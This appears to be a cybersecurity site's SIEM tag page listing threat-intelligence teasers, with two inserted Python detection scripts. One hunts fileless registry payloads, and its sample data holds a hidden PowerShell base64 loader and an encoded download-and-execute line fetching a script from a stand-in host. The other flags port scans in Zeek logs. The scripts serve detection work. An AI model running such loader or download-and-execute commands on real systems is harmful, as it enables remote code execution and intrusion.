On July 11, 2024, the Cybersecurity and Infrastructure Security Agency (CISA) released a Cybersecurity Advisory (CSA) detailing the Tactics, Techniques and Procedures (TTPs), mitigation strategies, and detection methods associated with a red team assessment carried out by CISA against a Federal Civilian Executive Branch (FCEB) organization.…
Tag: SIEM
Summary
Insikt Group's research reveals that OilAlpha, a likely pro-Houthi group, continues to target humanitarian and human rights organizations operating in Yemen. They use malicious Android applications to steal credentials and gather intelligence, potentially to control aid distribution. Notable organizations affected include CARE International and the Norwegian Refugee Council.…
July 10, 2024
tldr: Threat actors today are evolving new tactics in order to evade traditional AV detections. Let’s dive into a technique growing in popularity: fileless code execution through the Windows registry.…
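The technique teased above (a script payload stored in a registry value and pulled into memory by a small loader command, typically an autorun entry) leaves artifacts a SIEM can hunt for even though no file is written. The following is an added example, not code from the original post: it scans a set of registry values, in the shape a collector would produce from winreg or from Sysmon Event ID 13 (RegistryEvent, value set), for loader commands that read and decode registry data, and for values whose base64 content decodes to script text. The sample values, key paths, regex patterns and the 64-character length threshold are constructed assumptions for illustration.

```python
"""Hunt for fileless registry-resident payloads: loader commands that read
and decode registry data, and values holding base64-encoded script text.
Added example (not from the original post); sample values are constructed."""
import base64
import re

# Constructed sample in the shape a collector would emit from winreg or from
# Sysmon Event ID 13 (RegistryEvent, value set). Key paths and names are made up.
SAMPLE_VALUES = [
    {"key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "name": "OneDriveUpd",
     "data": r'powershell.exe -w hidden -nop -c "iex ([Text.Encoding]::Unicode.GetString('
             r'[Convert]::FromBase64String((gp HKCU:\Software\AppCache).blob)))"'},
    {"key": r"HKCU\Software\AppCache", "name": "blob",
     "data": base64.b64encode(
         "Invoke-WebRequest http://192.0.2.10/s.ps1 | Invoke-Expression".encode("utf-16-le")).decode()},
    {"key": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "name": "SecurityHealth",
     "data": r"C:\Windows\system32\SecurityHealthSystray.exe"},
    {"key": r"HKCU\Software\Contoso\App", "name": "Theme", "data": "dark"},
]

# Script hosts commonly used as the in-memory loader.
LOADER_RE = re.compile(r"\b(powershell|pwsh|mshta|wscript|cscript|rundll32|regsvr32)\b", re.I)
# Signs the command pulls its payload from the registry or decodes it inline.
LOADER_READS_RE = re.compile(
    r"(get-itemproperty|\bgp\b|frombase64string|\biex\b|invoke-expression|-e(nc(odedcommand)?)?\b)", re.I)
# Base64 alphabet only, long enough to hold more than a short setting (assumed threshold).
B64_RE = re.compile(r"^[A-Za-z0-9+/]{64,}={0,2}$")
# Tokens that make decoded text look like a script rather than opaque data.
SCRIPT_RE = re.compile(r"(invoke-\w+|\biex\b|downloadstring|frombase64string|new-object|start-process)", re.I)


def decode_embedded_script(data):
    """Return decoded script text if `data` is long base64 that decodes to printable,
    PowerShell-looking text; UTF-16LE is tried first because [Convert]-style loaders
    usually store Unicode, then UTF-8. Returns None for anything else."""
    if not B64_RE.match(data):
        return None
    try:
        raw = base64.b64decode(data, validate=True)
    except ValueError:          # binascii.Error is a ValueError subclass
        return None
    for encoding in ("utf-16-le", "utf-8"):
        try:
            text = raw.decode(encoding)
        except UnicodeDecodeError:
            continue
        if all(c.isprintable() or c in "\r\n\t" for c in text) and SCRIPT_RE.search(text):
            return text
    return None


def scan_registry_values(values):
    """Return (key, name, reason) findings for each suspicious value."""
    findings = []
    for v in values:
        data = v["data"]
        # A loader: script host plus a registry read or inline decode in one command line.
        if LOADER_RE.search(data) and LOADER_READS_RE.search(data):
            findings.append((v["key"], v["name"], "loader command reads/decodes registry data"))
        # A payload: the value itself is an encoded script.
        script = decode_embedded_script(data)
        if script is not None:
            findings.append((v["key"], v["name"], f"encoded script payload: {script[:40]}"))
    return findings


if __name__ == "__main__":
    for key, name, reason in scan_registry_values(SAMPLE_VALUES):
        print(f"{key}\\{name}: {reason}")
```

The two checks are deliberately independent: a loader in a Run key is suspicious on its own, and a large decodable blob is suspicious wherever it sits, since the payload value is usually placed under an innocuous-looking key away from the autorun location.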
In early 2023, the Cybersecurity and Infrastructure Security Agency (CISA) conducted a SILENTSHIELD red team assessment against a Federal Civilian Executive Branch (FCEB) organization. During SILENTSHIELD assessments, the red team first performs a no-notice, long-term simulation of nation-state cyber operations. The team mimics the techniques, tradecraft, and behaviors of sophisticated threat actors and measures the potential dwell time actors have on a network, providing a realistic assessment of the organization’s security posture.…
Nefilim is a Ransomware-as-a-Service (RaaS) operation that emerged in March 2020 and is believed to have evolved from the Nemty ransomware family: it appeared at the time Nemty’s operators abandoned the RaaS model to concentrate on more selective attacks with more dedicated resources.…
Threat Intelligence (TI) is sometimes criticized as inaccurate or outdated, but there are compelling reasons to incorporate it into a cybersecurity defense strategy. Here are some ways to use TI effectively as part of the security operations lifecycle.…
Sandworm is a highly sophisticated Russian adversary, active since at least 2009, attributed to the Main Center for Special Technologies (GTsST), military Unit 74455, of Russia’s Main Intelligence Directorate (GRU).
Sandworm is characterized by the use of malware families specifically designed to compromise Industrial Control System (ICS) and Supervisory Control and Data Acquisition (SCADA) systems found in entities located in the Energy, Government, and Media sectors.…
Cyber threats are becoming increasingly sophisticated and frequent, making it imperative for organizations to leverage cyber threat intelligence to stay ahead of potential cyber attacks. Organizations across all industries are recognizing the importance of implementing robust threat intelligence solutions to stay ahead of cybercriminals and protect their valuable assets.…
Summary: A recent supply chain attack conducted through multiple CDNs has been traced back to a common operator, impacting a large number of websites.
Threat Actor: Unknown | Victim: Multiple websites
Key Point :
A large-scale supply chain attack was conducted through multiple CDNs, affecting tens of millions of websites.…
Phishing is a formidable, and financially devastating, threat costing organizations $4.76 million USD per breach on average. With a simple, deceptive email, adversaries can masquerade as trusted entities, tricking even savvy individuals into handing over their credentials and other sensitive information. Whether it’s a duplicitous link or a crafty call to action, phishing remains one of the most insidious cybersecurity threats, leveraging a vulnerability that can’t be patched: human nature.…
Phishing is the weapon of choice for many adversaries. And it’s easy to understand why: Users fall victim to attacks in under 60 seconds on average, novice cybercriminals can launch effective phishing campaigns thanks to off-the-shelf phishing kits and generative AI, and above all, it works — 71% of organizations reported at least one successful attack in 2023.…
Summary: This content provides an overview of Zeek, an open-source network analysis framework that operates as a versatile sensor to monitor network traffic and generate comprehensive logs and output for analysis.
Threat Actor: N/A
Victim: N/A
Key Point :
Zeek is an open-source network analysis framework that operates as a versatile sensor to monitor network traffic.…
From November 2023 to April 2024, Insikt Group identified cyber-espionage activities conducted by RedJuliett, a likely Chinese state-sponsored group, primarily targeting government, academic, technology, and diplomatic organizations in Taiwan. RedJuliett exploited known vulnerabilities in network edge devices such as firewalls, virtual private networks (VPNs), and load balancers for initial access.…
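For the Zeek item above: Zeek writes each log as tab-separated text with #fields/#types header directives, "-" for unset fields and "(empty)" for empty ones, so a SIEM ingestion step needs a typed parser rather than a naive split. The following is an added example, not Zeek's own code: it parses a constructed conn.log excerpt (a reduced column set; real logs carry more) and flags source hosts that touched many distinct TCP ports on one destination without completing a handshake (conn_state S0, REJ or RSTOS0), a simple port-scan heuristic. The five-port threshold and the sample records are assumptions.

```python
"""Typed parser for Zeek TSV logs plus a port-scan heuristic over conn.log.
Added example, not part of Zeek; the log excerpt below is constructed."""
from collections import defaultdict

# Constructed conn.log excerpt with a reduced #fields set (real logs carry more columns).
SAMPLE_CONN_LOG = (
    "#separator \\x09\n"
    "#set_separator\t,\n"
    "#empty_field\t(empty)\n"
    "#unset_field\t-\n"
    "#path\tconn\n"
    "#fields\tts\tuid\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tproto\tservice"
    "\tduration\torig_bytes\tresp_bytes\tconn_state\thistory\n"
    "#types\ttime\tstring\taddr\tport\taddr\tport\tenum\tstring"
    "\tinterval\tcount\tcount\tstring\tstring\n"
    "1720612800.10\tCa1\t10.0.0.5\t51234\t10.0.0.20\t21\ttcp\t-\t-\t-\t-\tS0\tS\n"
    "1720612800.12\tCa2\t10.0.0.5\t51235\t10.0.0.20\t22\ttcp\t-\t-\t-\t-\tS0\tS\n"
    "1720612800.15\tCa3\t10.0.0.5\t51236\t10.0.0.20\t23\ttcp\t-\t-\t-\t-\tREJ\tSr\n"
    "1720612800.17\tCa4\t10.0.0.5\t51237\t10.0.0.20\t25\ttcp\t-\t-\t-\t-\tS0\tS\n"
    "1720612800.20\tCa5\t10.0.0.5\t51238\t10.0.0.20\t80\ttcp\t-\t-\t-\t-\tS0\tS\n"
    "1720612800.22\tCa6\t10.0.0.5\t51239\t10.0.0.20\t443\ttcp\t-\t-\t-\t-\tS0\tS\n"
    "1720612801.50\tCb1\t10.0.0.7\t49152\t10.0.0.20\t443\ttcp\tssl\t12.5\t1450\t98200\tSF\tShADadFf\n"
    "1720612802.00\tCb2\t10.0.0.7\t49153\t10.0.0.20\t53\tudp\tdns\t0.02\t60\t140\tSF\tDd\n"
    "#close\t2024-07-10-12-00-05\n"
)


def _convert(value, ztype):
    """Map one Zeek text field to a Python value using the #types row."""
    if value == "-":            # #unset_field
        return None
    if value == "(empty)":      # #empty_field (empty string/set/vector)
        return ""
    if ztype in ("count", "int", "port"):
        return int(value)
    if ztype in ("time", "interval", "double"):
        return float(value)
    if ztype == "bool":
        return value == "T"
    return value                # string, addr, enum, set[...] stay as text


def parse_zeek_log(text):
    """Parse one Zeek TSV log into a list of dicts keyed by the #fields names."""
    fields, types, rows = [], [], []
    for line in text.splitlines():
        if not line:
            continue
        if line.startswith("#"):
            key, _, rest = line[1:].partition("\t")
            if key == "fields":
                fields = rest.split("\t")
            elif key == "types":
                types = rest.split("\t")
            continue                # other directives (#separator, #path, #close ...) are ignored
        values = line.split("\t")
        if not fields or len(values) != len(fields):
            raise ValueError(f"malformed record (expected {len(fields)} fields): {line!r}")
        types = types or ["string"] * len(fields)   # tolerate a log without #types
        rows.append({f: _convert(v, t) for f, v, t in zip(fields, values, types)})
    return rows


SCAN_STATES = {"S0", "REJ", "RSTOS0"}   # TCP attempts whose handshake never completed


def find_port_scans(rows, min_ports=5):
    """Return {(orig_h, resp_h): sorted ports} for pairs with at least min_ports
    distinct destination ports whose connection never completed."""
    touched = defaultdict(set)
    for r in rows:
        if r["proto"] == "tcp" and r["conn_state"] in SCAN_STATES:
            touched[(r["id.orig_h"], r["id.resp_h"])].add(r["id.resp_p"])
    return {pair: sorted(ports) for pair, ports in touched.items() if len(ports) >= min_ports}


if __name__ == "__main__":
    records = parse_zeek_log(SAMPLE_CONN_LOG)
    for (src, dst), ports in find_port_scans(records).items():
        print(f"possible scan {src} -> {dst}: {ports}")
```

Keeping the #types row drives the conversion, so a field such as orig_bytes arrives as an integer (or None when Zeek never saw payload), which is what lets the detection logic compare and aggregate without string parsing scattered through the rules.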
Recent history could be termed the Age of Ransomware in the realm of cybercrime. However, threat actors have discovered a way to profit without the need for malware development or sophisticated methods. SpaceBears is a new participant in the Data Broker trend, which has gained momentum particularly because of major law-enforcement crackdowns on ransomware groups.…
Winnti is a notorious adversary that has been operational since at least 2010 and is believed to be operating in coordination with or supported by the Chinese government. The group has conducted cyber espionage and financially motivated activities across various industries, including technology, healthcare, and pharmaceuticals.…
Summary: This content discusses the importance of process mapping in cybersecurity and how it can revolutionize understanding and managing the security landscape.
Threat Actor: N/A | Victim: N/A
Key Point :
Cybersecurity is not just about firewalls and antivirus, but also about understanding how defenses, people, and processes work together.…
On Substack, publications run by cybersecurity professionals and journalists with expertise in cybersecurity can help practitioners keep pace with developments in security operations and many other areas of cybersecurity.…
Summary: The BlackSuit ransomware gang has leaked stolen data from attacks against 53 organizations over the course of a year.
Threat Actor: BlackSuit ransomware gang | Victim: 53 organizations
Key Point :
The BlackSuit ransomware gang, believed to be spun off from the Royal ransomware gang, primarily targets US-based companies in critical sectors such as education and industrial goods.…
Summary: Security researchers have released a proof-of-concept exploit for a remote code execution vulnerability in Fortinet’s SIEM solution, which allows executing commands as root on Internet-facing FortiSIEM appliances.
Threat Actor: N/A (proof-of-concept published by Horizon3’s Attack Team) | Victim: Fortinet (FortiSIEM appliances)
Key Point :
A proof-of-concept exploit has been released for a remote code execution vulnerability in Fortinet’s SIEM solution.…
Artificial Intelligence (AI) is increasingly being integrated into various industries, and cybersecurity is no exception. This article delves into the potential of AI to transform the cybersecurity landscape, addressing common concerns and highlighting the areas where AI is already making significant contributions.
AI’s Impact on Cybersecurity Jobs
Will AI Overtake Cybersecurity in the Next Five Years?…